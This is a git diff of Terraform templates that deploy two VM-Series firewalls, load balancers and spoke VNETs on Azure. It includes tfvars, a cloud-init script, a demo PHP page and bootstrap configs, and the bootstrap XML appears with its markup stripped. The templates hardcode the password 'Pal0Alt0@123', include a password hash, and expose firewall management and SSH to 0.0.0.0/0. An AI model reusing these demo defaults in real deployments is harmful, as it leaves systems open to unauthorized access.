+ + + + * + + + yes + + + + + $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + +
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt similarity index 80% rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt rename to azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt index 840154aa..44878949 100644 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt @@ -4,6 +4,6 @@ default-gateway= netmask= ipv6-address= ipv6-default-gateway= -hostname=vm-series +dhcp-accept-server-hostname=yes dns-primary=8.8.8.8 dns-secondary=4.2.2.2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes new file mode 100644 index 00000000..e69de29b diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/fw_common.tf b/azure/transit_2fw_2spoke_common/fw_common.tf new file mode 100644 index 00000000..2f261ad5 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/fw_common.tf @@ -0,0 +1,121 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create resource group for FWs, FW NICs, and FW LBs + +resource "azurerm_resource_group" "common_fw" { + name = "${var.global_prefix}${var.fw_prefix}-rg" + location = var.location +} + +#----------------------------------------------------------------------------------------------------------------- +# Create storage account and file share for bootstrapping + +resource "random_string" "main" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_account" "main" { + name = random_string.main.result + account_tier = "Standard" + account_replication_type = "LRS" + location = azurerm_resource_group.common_fw.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +module "common_fileshare" { + source = "./modules/azure_bootstrap/" + name = "${var.fw_prefix}-bootstrap" + quota = 1 + storage_account_name = azurerm_storage_account.main.name + storage_account_key = azurerm_storage_account.main.primary_access_key + local_file_path = "bootstrap_files/" +} + + +#----------------------------------------------------------------------------------------------------------------- +# Create VM-Series. For every fw_name entered, an additional VM-Series instance will be deployed. + +module "common_fw" { + source = "./modules/vmseries/" + name = "${var.fw_prefix}-vm" + vm_count = var.fw_count + username = var.fw_username + password = var.fw_password + panos = var.fw_panos + license = var.fw_license + nsg_prefix = var.fw_nsg_prefix + avset_name = "${var.fw_prefix}-avset" + subnet_mgmt = module.vnet.vnet_subnets[0] + subnet_untrust = module.vnet.vnet_subnets[1] + subnet_trust = module.vnet.vnet_subnets[2] + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + nic1_backend_pool_ids = [module.common_extlb.backend_pool_id] + nic2_backend_pool_ids = [module.common_intlb.backend_pool_id] + bootstrap_storage_account = azurerm_storage_account.main.name + bootstrap_access_key = azurerm_storage_account.main.primary_access_key + bootstrap_file_share = module.common_fileshare.file_share_name + bootstrap_share_directory = "None" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name + + dependencies = [ + module.common_fileshare.completion + ] +} + +#----------------------------------------------------------------------------------------------------------------- +# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool. + +module "common_extlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-public-lb" + type = "public" + sku = "Standard" + probe_ports = [22] + frontend_ports = [80, 22, 443] + backend_ports = [80, 22, 443] + protocol = "Tcp" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool + +module "common_intlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-internal-lb" + type = "private" + sku = "Standard" + probe_ports = [22] + frontend_ports = [0] + backend_ports = [0] + protocol = "All" + subnet_id = module.vnet.vnet_subnets[2] + private_ip_address = var.fw_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Outputs to terminal + +output EXT-LB { + value = "http://${module.common_extlb.public_ip[0]}" +} + +output MGMT-FW1 { + value = "https://${module.common_fw.nic0_public_ip[0]}" +} + +output MGMT-FW2 { + value = "https://${module.common_fw.nic0_public_ip[1]}" +} + +output SSH-TO-SPOKE2 { + value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}" +} diff --git a/azure/transit_2fw_2spoke_common/fw_vnet.tf b/azure/transit_2fw_2spoke_common/fw_vnet.tf new file mode 100644 index 00000000..826b7152 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/fw_vnet.tf @@ -0,0 +1,16 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create Transit VNET +resource "azurerm_resource_group" "transit" { + name = "${var.global_prefix}${var.transit_prefix}-rg" + location = var.location +} + +module "vnet" { + source = "./modules/vnet/" + name = "${var.transit_prefix}-vnet" + address_space = var.transit_vnet_cidr + subnet_names = var.transit_subnet_names + subnet_prefixes = var.transit_subnet_cidrs + location = var.location + resource_group_name = azurerm_resource_group.transit.name +} diff --git a/azure/transit_2fw_2spoke_common/images/diagram.png b/azure/transit_2fw_2spoke_common/images/diagram.png new file mode 100644 index 00000000..45f1d146 Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/diagram.png differ diff --git a/azure/transit_2fw_2spoke_common/images/tfvars.png b/azure/transit_2fw_2spoke_common/images/tfvars.png new file mode 100644 index 00000000..afd57343 Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/tfvars.png differ diff --git a/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf new file mode 100644 index 00000000..1a5c1f7a --- /dev/null +++ b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf @@ -0,0 +1,40 @@ + + +resource "random_string" "randomstring" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_share" "main" { + name = "${var.name}${random_string.randomstring.result}" + storage_account_name = var.storage_account_name + quota = var.quota +} + +resource "null_resource" "upload" { +provisioner "local-exec" { + command = < + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl new file mode 100644 index 00000000..1d02e945 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl @@ -0,0 +1,10 @@ +#cloud-config + +runcmd: + - sudo apt-get update -y + - sudo apt-get install -y php + - sudo apt-get install -y apache2 + - sudo apt-get install -y libapache2-mod-php + - sudo rm -f /var/www/html/index.html + - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php + - sudo systemctl restart apache2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/spokes.tf b/azure/transit_2fw_2spoke_common/spokes.tf new file mode 100644 index 00000000..ea6ab06c --- /dev/null +++ b/azure/transit_2fw_2spoke_common/spokes.tf @@ -0,0 +1,97 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs + +resource "azurerm_resource_group" "spoke1_rg" { + name = "${var.global_prefix}${var.spoke1_prefix}-rg" + location = var.location +} + +module "spoke1_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke1_prefix}-vnet" + address_space = var.spoke1_vnet_cidr + subnet_prefixes = var.spoke1_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + route_table_destinations = var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +data "template_file" "web_startup" { + template = "${file("${path.module}/scripts/web_startup.yml.tpl")}" +} + +module "spoke1_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke1_prefix}-vm" + vm_count = var.spoke1_vm_count + subnet_id = module.spoke1_vnet.vnet_subnets[0] + availability_set_id = "" + backend_pool_ids = [module.spoke1_lb.backend_pool_id] + custom_data = base64encode(data.template_file.web_startup.rendered) + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +module "spoke1_lb" { + source = "./modules/lb/" + name = "${var.spoke1_prefix}-lb" + type = "private" + sku = "Standard" + probe_ports = [80] + frontend_ports = [80] + backend_ports = [80] + protocol = "Tcp" + enable_floating_ip = false + subnet_id = module.spoke1_vnet.vnet_subnets[0] + private_ip_address = var.spoke1_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create spoke2 resource group, spoke2 VNET, spoke2 VM + +resource "azurerm_resource_group" "spoke2_rg" { + name = "${var.global_prefix}${var.spoke2_prefix}-rg" + location = var.location +} + +module "spoke2_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke2_prefix}-vnet" + address_space = var.spoke2_vnet_cidr + subnet_prefixes = var.spoke2_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + route_table_destinations = var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} + +module "spoke2_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke2_prefix}-vm" + vm_count = var.spoke2_vm_count + subnet_id = module.spoke2_vnet.vnet_subnets[0] + availability_set_id = "" + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/terraform.tfvars b/azure/transit_2fw_2spoke_common/terraform.tfvars new file mode 100644 index 00000000..2f122c28 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/terraform.tfvars @@ -0,0 +1,43 @@ +#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode +#fw_license = "bundle1" +#fw_license = "bundle2" + +global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription +location = "eastus" + +# ----------------------------------------------------------------------- +# VM-Series resource group variables + +fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group +fw_count = 2 +fw_panos = "9.0.1" +fw_nsg_prefix = "0.0.0.0/0" +fw_username = "paloalto" +fw_password = "Pal0Alt0@123" +fw_internal_lb_ip = "10.0.2.100" + +# ----------------------------------------------------------------------- +# Transit resource group variables + +transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group +transit_vnet_cidr = "10.0.0.0/16" +transit_subnet_names = ["mgmt", "untrust", "trust"] +transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24"] + +# ----------------------------------------------------------------------- +# Spoke resource group variables + +spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group +spoke1_vm_count = 2 +spoke1_vnet_cidr = "10.1.0.0/16" +spoke1_subnet_cidrs = ["10.1.0.0/24"] +spoke1_internal_lb_ip = "10.1.0.100" + +spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group +spoke2_vm_count = 1 +spoke2_vnet_cidr = "10.2.0.0/16" +spoke2_subnet_cidrs = ["10.2.0.0/24"] + +spoke_username = "paloalto" +spoke_password = "Pal0Alt0@123" +spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"] \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/variables.tf b/azure/transit_2fw_2spoke_common/variables.tf new file mode 100644 index 00000000..4899c169 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/variables.tf @@ -0,0 +1,129 @@ +variable location { + description = "Enter a location" +} + +variable fw_prefix { + description = "Prefix to add to all resources added in the firewall resource group" + default = "" +} + +variable fw_license { + description = "VM-Series license: byol, bundle1, or bundle2" + # default = "byol" + # default = "bundle1" + # default = "bundle2" +} + +variable global_prefix { + description = "Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription" +} +#----------------------------------------------------------------------------------------------------------------- +# Transit VNET variables + +variable transit_prefix { +} + +variable transit_vnet_cidr { +} + +variable transit_subnet_names { + type = list(string) +} + +variable transit_subnet_cidrs { + type = list(string) +} + +#----------------------------------------------------------------------------------------------------------------- +# VM-Series variables + +variable fw_count { +} + +variable fw_nsg_prefix { +} + +variable fw_panos { +} + +variable fw_username { +} + +variable fw_password { +} + +variable fw_internal_lb_ip { +} + +#----------------------------------------------------------------------------------------------------------------- +# Spoke variables + +variable spoke_username { +} + +variable spoke_password { +} + +variable spoke_udrs { +} + +variable spoke1_prefix { + description = "Prefix to add to all resources added in spoke1's resource group" +} + +variable spoke1_vm_count { +} + +variable spoke1_vnet_cidr { +} + +variable spoke1_subnet_cidrs { + type = list(string) +} + +variable spoke1_internal_lb_ip { +} + +variable spoke2_prefix { + description = "Prefix to add to all resources added in spoke2's resource group" +} + +variable spoke2_vm_count { +} + +variable spoke2_vnet_cidr { +} + +variable spoke2_subnet_cidrs { + type = list(string) +} + +variable tags { + description = "The tags to associate with newly created resources" + type = map(string) + + default = {} +} + +#----------------------------------------------------------------------------------------------------------------- +# Azure environment variables + +variable client_id { + description = "Azure client ID" + default = "" +} + +variable client_secret { + description = "Azure client secret" + default = "" +} + +variable subscription_id { + description = "Azure subscription ID" + default = "" +} + +variable tenant_id { + description = "Azure tenant ID" + default = "" +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf new file mode 100644 index 00000000..c66ebfe6 Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf differ diff --git a/azure/transit_2fw_2spoke_common_appgw/README.md b/azure/transit_2fw_2spoke_common_appgw/README.md new file mode 100644 index 00000000..01101669 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/README.md @@ -0,0 +1,60 @@ +# 2 x VM-Series / Public LB / Internal LB / AppGW / 2 x Spoke VNETs + +This is an extension of the Terraform template located at [**transit_2fw_2spoke_common**](https://github.com/wwce/terraform/tree/master/azure/transit_2fw_2spoke_common). + +Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer or an application gateway (both are deployed). The Application Gateway is configured to load balance HTTP traffic on port 80. + +N.B. - The template can take 15+ minutes to complete due to the Application Gateway deployment time. When complete, the FQDN of the Application Gateway is included in the output. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information. + +
+ +## Prerequistes +* Valid Azure Subscription +* Access to Azure Cloud Shell + +
+ +## How to Deploy +### 1. Setup & Download Build +In the Azure Portal, open Azure Cloud Shell and run the following **BASH ONLY!**. +``` +# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2) +$ az vm image terms accept --urn paloaltonetworks:vmseries1::9.0.1 + +# Download repo & change directories to the Terraform build +$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1. + +``` +$ vi terraform.tfvars +``` + +

+Your terraform.tfvars should look like this before proceeding + +

+ +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
+ +## How to Destroy +Run the following to destroy the build. +``` +$ terraform destroy +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml new file mode 100644 index 00000000..47185aa0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml @@ -0,0 +1,1058 @@ + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + 8.8.8.8 + 4.2.2.2 + + + fw1 + + + + yes + + + FQDN + + fw1 + paloalto + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + + + + yes + + + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + no + no + yes + no + no + no + no + no + no + no + no + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.1.0.0/16 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + ethernet1/2 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 168.63.129.16/32 + + + + + + + untrust-vr + + + None + + + no + any + 2 + + 10 + 0.0.0.0/0 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.1.0.0/16 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + + + + + ethernet1/2 + + + no + + + + + ethernet1/1 + + + no + + + + + + ethernet1/2 + ethernet1/1 + vlan + loopback + tunnel + + + + untrust-vr + trust-vr + + + + + + + + + + + 22 + + + + + + + + + + + + + + + any + + + any + + + azure-lb-probe + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + application-default + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + universal + + trust + + + trust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + spoke1-vnet + spoke2-vnet + + no + + ping + ssh + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + universal + + trust + + + untrust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + any + + no + + apt-get + ntp + ping + ssl + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + + + + + + + + + ipv4 + + untrust + + + untrust + + any + any + + azure-lb-probe + + + any + + no + This NAT policy prevents the public load balancer's health probes from being NATed. + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + service-http + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke1-intlb + 80 + + NATs inbound request to internal LB in spoke1 + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + tcp-22 + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke2-vm + 22 + + NATs inbound request to jump server in Spoke 1. + + + ipv4 + + trust + + + untrust + + any + any + + any + + + any + + + + + ethernet1/1 + + + + no + + + + + + + + + + + + + +
+ + 168.63.129.16/32 + + azure-resource + + + + 10.1.0.4 + + azure-resource + + + + 10.2.0.4 + + azure-resource + + + + 10.1.0.0/16 + + azure-resource + + + + 10.2.0.0/16 + + azure-resource + + + + 10.1.0.100 + + azure-resource + + +
+ + + + + + + + + + color20 + + + color13 + + + color24 + + + color22 + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+ + + + * + + + yes + + + + + $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + +
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt new file mode 100644 index 00000000..44878949 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt @@ -0,0 +1,9 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes new file mode 100644 index 00000000..e69de29b diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_common.tf b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf new file mode 100644 index 00000000..e35b4dd1 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf @@ -0,0 +1,134 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create resource group for FWs, FW NICs, and FW LBs + +resource "azurerm_resource_group" "common_fw" { + name = "${var.global_prefix}-${var.fw_prefix}-rg" + location = var.location +} + +#----------------------------------------------------------------------------------------------------------------- +# Create storage account and file share for bootstrapping + +resource "random_string" "main" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_account" "main" { + name = random_string.main.result + account_tier = "Standard" + account_replication_type = "LRS" + location = azurerm_resource_group.common_fw.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +module "common_fileshare" { + source = "./modules/azure_bootstrap/" + name = "${var.fw_prefix}-bootstrap" + quota = 1 + storage_account_name = azurerm_storage_account.main.name + storage_account_key = azurerm_storage_account.main.primary_access_key + local_file_path = "bootstrap_files/" +} + + +#----------------------------------------------------------------------------------------------------------------- +# Create VM-Series. For every fw_name entered, an additional VM-Series instance will be deployed. + +module "common_fw" { + source = "./modules/vmseries/" + name = "${var.fw_prefix}-vm" + vm_count = var.fw_count + username = var.fw_username + password = var.fw_password + panos = var.fw_panos + license = var.fw_license + nsg_prefix = var.fw_nsg_prefix + avset_name = "${var.fw_prefix}-avset" + subnet_mgmt = module.vnet.vnet_subnets[0] + subnet_untrust = module.vnet.vnet_subnets[1] + subnet_trust = module.vnet.vnet_subnets[2] + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + nic1_backend_pool_ids = [module.common_extlb.backend_pool_id] + nic2_backend_pool_ids = [module.common_intlb.backend_pool_id] + bootstrap_storage_account = azurerm_storage_account.main.name + bootstrap_access_key = azurerm_storage_account.main.primary_access_key + bootstrap_file_share = module.common_fileshare.file_share_name + bootstrap_share_directory = "None" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name + dependencies = [ + module.common_fileshare.completion + ] +} + +#----------------------------------------------------------------------------------------------------------------- +# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool. + +module "common_extlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-public-lb" + type = "public" + sku = "Standard" + probe_ports = [22] + frontend_ports = [80, 22, 443] + backend_ports = [80, 22, 443] + protocol = "Tcp" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool + +module "common_intlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-internal-lb" + type = "private" + sku = "Standard" + probe_ports = [22] + frontend_ports = [0] + backend_ports = [0] + protocol = "All" + subnet_id = module.vnet.vnet_subnets[2] + private_ip_address = var.fw_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +# Create Application Gateway. Load balancer uses firewall's untrust interface IPs as its backend pool + +module "common_appgw" { + source = "./modules/appgw/" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name + subnet_appgw = module.vnet.vnet_subnets[3] + fw_private_ips = module.common_fw.nic1_private_ip +} + +#----------------------------------------------------------------------------------------------------------------- +# Outputs to terminal + +output AppGW { + value = "http://${module.common_appgw.appgw_fqdn}" +} + +output EXT-LB { + value = "http://${module.common_extlb.public_ip[0]}" +} + +output MGMT-FW1 { + value = "https://${module.common_fw.nic0_public_ip[0]}" +} + +output MGMT-FW2 { + value = "https://${module.common_fw.nic0_public_ip[1]}" +} + +output SSH-TO-SPOKE2 { + value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}" +} diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf new file mode 100644 index 00000000..4ee6701d --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf @@ -0,0 +1,16 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create Transit VNET +resource "azurerm_resource_group" "transit" { + name = "${var.global_prefix}-${var.transit_prefix}-rg" + location = var.location +} + +module "vnet" { + source = "./modules/vnet/" + name = "${var.transit_prefix}-vnet" + address_space = var.transit_vnet_cidr + subnet_names = var.transit_subnet_names + subnet_prefixes = var.transit_subnet_cidrs + location = var.location + resource_group_name = azurerm_resource_group.transit.name +} diff --git a/azure/transit_2fw_2spoke_common_appgw/images/diagram.png b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png new file mode 100644 index 00000000..45f1d146 Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png differ diff --git a/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png new file mode 100644 index 00000000..afd57343 Binary files /dev/null and 